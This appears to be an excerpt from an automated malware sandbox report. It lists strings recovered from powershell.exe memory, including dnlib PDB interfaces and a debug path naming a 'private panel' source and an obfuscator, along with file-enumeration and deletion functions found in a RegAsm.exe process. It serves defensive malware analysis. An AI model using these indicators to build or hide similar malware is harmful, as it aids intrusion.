            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000015.00000002.889873904.0000000004FFE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
